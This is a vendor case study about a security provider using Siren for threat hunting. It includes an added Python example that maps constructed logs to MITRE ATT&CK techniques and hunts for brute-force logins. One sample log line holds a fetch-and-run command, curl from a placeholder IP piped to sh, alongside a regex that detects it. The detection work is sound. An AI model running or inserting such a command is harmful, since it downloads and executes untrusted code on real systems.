Cyber Threat Hunting

Siren for Cyber Threat Hunting

A Managed Security Service Provider Uses Siren for Enterprise Cyber Threat Hunting

Integrated Capabilities to Fully Support Cyber Threat Hunting

Cybersecurity threats represent the single greatest menace to governments and corporations today. It takes little imagination to picture the catastrophic effect of a nation losing control of its critical IT infrastructure, a corporation losing control of its key intellectual property, or any organization becoming a victim of sabotage or extortion. This case study highlights how Siren enabled a Managed Security Service Provider (MSSP) to deploy an enterprise-wide cyber threat hunting solution that delivers actionable insights.

THE PROBLEM

Hard to Integrate Large Datasets from Multiple Sources & Upskill Analysts

This firm had an extensive amount of data but little integration across the sources in its Security Operations Centre (SOC). Open source data arriving from multiple sources across all security domains was difficult to integrate. The MITRE model, widely used to describe how entities in the cyber domain interconnect and to identify attack patterns, was hard to apply in practice. The firm wanted to take a proactive stance on threats rather than only react when things went wrong.

The methods our customer traditionally used to identify threat actors or investigate cyber threat signals were ad hoc and manual, spread across disconnected datasets. To make sense of system logs and network monitoring data, security analysts often copied and pasted specific alerts or IPs from one point solution into another, trying to pivot through different dashboards, and ended up writing long, complex search queries. The process was difficult, time-consuming, and inefficient.

THE SOLUTION

Siren for Cyber Threat Hunting

This Siren deployment was implemented in a period of 1 month, integrating all relevant datasets into a single pane of glass from which analysts could hunt and analyse threats in real time. Siren’s flexible data model allowed security analysts to rapidly ingest discrete datasets on the fly. The MITRE ATT&CK model was used to encode, define, and present attacks in an easy-to-understand form, translating complex, hard-to-read logs into meaningful cyber event types.

With Siren’s Web Services, analysts could instantly enrich their data from open source data. A dashboard was built for each index, and Siren’s relational navigation let analysts pivot across dashboards, making log exploration effortless without complex query languages. The integrated Knowledge Graph capability allowed analysts to quickly expand, investigate, and derive insights through intuitive link analysis, seeing the relations between nodes. No logs. No endless commands. A clear, easy-to-understand network graph.
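The two ideas in the solution section, translating raw logs into ATT&CK-labelled event types and then pivoting across the entities those events connect, can be shown in a few dozen lines. The following is an added illustration written for this page; it is not Siren’s code and does not use Siren’s APIs. The log lines, the regular expressions and the hunt rule are constructed for the example; the technique IDs (T1110, T1021, T1059) are the public MITRE ATT&CK identifiers.

```python
"""Tag constructed log lines with ATT&CK techniques, build a link graph of the
entities they mention, and run one hunt over the result. Added example only."""
import re
from collections import defaultdict

# Constructed sample logs (not taken from the case study).
SAMPLE_LOGS = [
    "2024-03-01T10:00:01Z host=web01 sshd: Failed password for root from 203.0.113.7 port 51022",
    "2024-03-01T10:00:02Z host=web01 sshd: Failed password for root from 203.0.113.7 port 51023",
    "2024-03-01T10:00:03Z host=web01 sshd: Failed password for root from 203.0.113.7 port 51024",
    "2024-03-01T10:00:09Z host=web01 sshd: Accepted password for root from 203.0.113.7 port 51030",
    "2024-03-01T10:01:15Z host=web01 bash: user=root cmd='curl http://198.51.100.9/x.sh | sh'",
    "2024-03-01T10:02:00Z host=db01 sshd: Accepted publickey for svc from 10.0.0.5 port 40000",
]

IPV4 = r"\d+\.\d+\.\d+\.\d+"

# Each rule maps a log pattern to a public ATT&CK technique ID and name.
# The patterns are constructed for the sample lines above (real sshd output varies).
RULES = [
    (re.compile(rf"Failed password for (?P<user>\S+) from (?P<src>{IPV4})"),
     "T1110", "Brute Force"),
    (re.compile(rf"Accepted (?:password|publickey) for (?P<user>\S+) from (?P<src>{IPV4})"),
     "T1021", "Remote Services"),
    (re.compile(r"user=(?P<user>\S+) cmd='(?P<cmd>[^']*(?:curl|wget)[^']*\|\s*(?:sh|bash)[^']*)'"),
     "T1059", "Command and Scripting Interpreter"),
]
HOST_RE = re.compile(r"host=(?P<host>\S+)")


def parse_events(lines):
    """Turn raw lines into ATT&CK-labelled event dicts; unmatched lines are dropped."""
    events = []
    for line in lines:
        host_m = HOST_RE.search(line)
        host = host_m.group("host") if host_m else "unknown"
        ts = line.split(" ", 1)[0]
        for rx, tid, tname in RULES:
            m = rx.search(line)
            if m:
                ev = {"ts": ts, "host": host, "technique_id": tid, "technique": tname}
                ev.update(m.groupdict())  # user / src / cmd captured by the rule
                events.append(ev)
                break
    return events


def build_link_graph(events):
    """Undirected graph linking each host to the IPs, users and techniques seen on it."""
    graph = defaultdict(set)

    def link(a, b):
        graph[a].add(b)
        graph[b].add(a)

    for ev in events:
        host = "host:" + ev["host"]
        link(host, "technique:" + ev["technique_id"])
        if ev.get("src"):
            link(host, "ip:" + ev["src"])
        if ev.get("user"):
            link(host, "user:" + ev["user"])
    return graph


def pivot(graph, node):
    """Return the sorted neighbours of a node: the 'what else touches this?' step."""
    return sorted(graph.get(node, ()))


def hunt_brute_force_success(events, min_failures=3):
    """Hunt: a successful remote login from a source that just produced
    min_failures or more failed logins against the same host."""
    failures = defaultdict(int)  # (host, src) -> count of T1110 events so far
    hits = []
    for ev in sorted(events, key=lambda e: e["ts"]):  # ISO timestamps sort lexically
        key = (ev["host"], ev.get("src"))
        if ev["technique_id"] == "T1110":
            failures[key] += 1
        elif ev["technique_id"] == "T1021" and failures[key] >= min_failures:
            hits.append({"ts": ev["ts"], "host": ev["host"], "src": ev["src"],
                         "user": ev["user"], "failures": failures[key]})
    return hits


if __name__ == "__main__":
    evs = parse_events(SAMPLE_LOGS)
    for ev in evs:
        print(ev["ts"], ev["host"], ev["technique_id"], ev["technique"])
    g = build_link_graph(evs)
    print("pivot from ip:203.0.113.7 ->", pivot(g, "ip:203.0.113.7"))
    print("hunt hits ->", hunt_brute_force_success(evs))
```

The pivot step is the part that a single dashboard cannot give you: starting from one IP, the graph lists every host, user and technique linked to it, which is what an analyst would otherwise obtain by hand-copying the value into another search. The hunt function shows why labelling events by technique matters, since the rule is written in terms of T1110 followed by T1021 rather than in terms of sshd message text.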

THE OUTCOME

Single View in the SOC & Rapid Time to Value

Siren provided a single pane of glass in the SOC for investigations, enabling analysts to search all the data from one place. The deployment resulted in a 2X faster time to resolution and the seamless integration of islands of data from multiple cyber datasets that had not been used in previous investigations. Efficiency increased with a 3X improvement in the time to train new analysts, a major benefit given the firm’s long-term challenge of quickly training people on the complexities of threat investigations. The intuitive user interface provided rapid time to value and actionable insights.
